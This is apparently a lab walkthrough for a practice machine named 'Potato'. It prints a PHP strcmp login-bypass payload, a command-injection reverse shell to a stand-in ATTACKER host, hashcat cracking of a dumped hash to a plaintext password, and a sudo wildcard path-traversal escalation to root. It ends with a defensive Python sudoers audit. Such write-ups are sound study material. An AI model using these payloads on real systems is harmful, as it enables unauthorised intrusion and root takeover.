Potato combines ProFTP enumeration, a PHP login bypass trick, password cracking, and a sudo misconfiguration that allows escaping into a root shell.
Target: Potato
Initial vector: ProFTP / web login bypass
Privilege escalation: sudo nice /notes/* → path traversal
ProFTP is running on port 2112:
$ ftp 192.168.234.101 2112
welcome.msg shows:
Welcome, archive user %U@%R ! The local time is: %T
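The web login compares credentials with strcmp in PHP. When a parameter arrives as an array instead of a string, strcmp in PHP versions before 8 returns NULL rather than an integer, which a loose == 0 comparison treats as a match. Bypass with array parameters: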
username[]=""&password[]=""
This leads to command injection via a log filename parameter (append ; command).
Get a reverse shell:
$ nc -nlvp 443 # trigger via crafted request with "; /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER/443 0>&1'"
Dump password hashes and crack them:
$ hashcat -a 0 -m 500 hash.txt -O /usr/share/wordlists/rockyou.txt -o cracked.txt
Result: webadmin:dragon
Switch to webadmin:
$ su webadmin
Password: dragon
Check sudo:
$ sudo -l
User webadmin may run the following commands on serv:
(ALL : ALL) /bin/nice /notes/*
Abuse path traversal: the * in the rule's argument also matches ../, so the argument can point outside /notes:
$ sudo /bin/nice /notes/../bin/bash
# id
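An added example, not part of the original write-up: a small Python audit that flags sudoers rules whose wildcard argument also accepts paths resolving outside the intended directory, as `/notes/*` does above. It approximates sudo's argument matching with `fnmatch`, where `*` also matches `/`; the function names and probe paths are constructed for illustration.

```python
import fnmatch
import posixpath
import shlex

# Constructed probe suffixes an auditor would try against each wildcard rule.
PROBES = ["notes.txt", "../bin/bash", "sub/../../tmp/probe"]

def parse_rule(line):
    """Split '(runas) /cmd arg-patterns...' into (command, [arg patterns])."""
    spec = line.split(")", 1)[1] if line.lstrip().startswith("(") else line
    parts = shlex.split(spec)
    return parts[0], parts[1:]

def literal_dir(pattern):
    """Directory part of the pattern that precedes the first wildcard."""
    cut = min((pattern.find(c) for c in "*?[" if c in pattern), default=len(pattern))
    return pattern[:cut].rsplit("/", 1)[0] or "/"

def escapes(pattern, arg):
    """True if arg satisfies the pattern but resolves outside its directory."""
    if not fnmatch.fnmatchcase(arg, pattern):
        return False
    base = posixpath.normpath(literal_dir(pattern))
    # Lexical normalisation only: symlinks are not followed here.
    resolved = posixpath.normpath(arg)
    return posixpath.commonpath([base, resolved]) != base

def audit(line):
    """Return (pattern, argument) pairs where a wildcard argument admits traversal."""
    _, patterns = parse_rule(line)
    findings = []
    for pat in patterns:
        if not any(c in pat for c in "*?["):
            continue  # fixed arguments cannot be steered by the caller
        base = literal_dir(pat)
        for probe in PROBES:
            candidate = posixpath.join(base, probe)
            if escapes(pat, candidate):
                findings.append((pat, candidate))
    return findings

if __name__ == "__main__":
    # First rule is the one from the sudo -l output; second is a fixed-argument variant.
    for rule in ["(ALL : ALL) /bin/nice /notes/*", "(ALL : ALL) /bin/nice /notes/todo.txt"]:
        print(rule, "->", audit(rule) or "no wildcard traversal")
```

A rule that names each permitted file explicitly, as in the second sample rule, produces no findings because the caller cannot influence the argument.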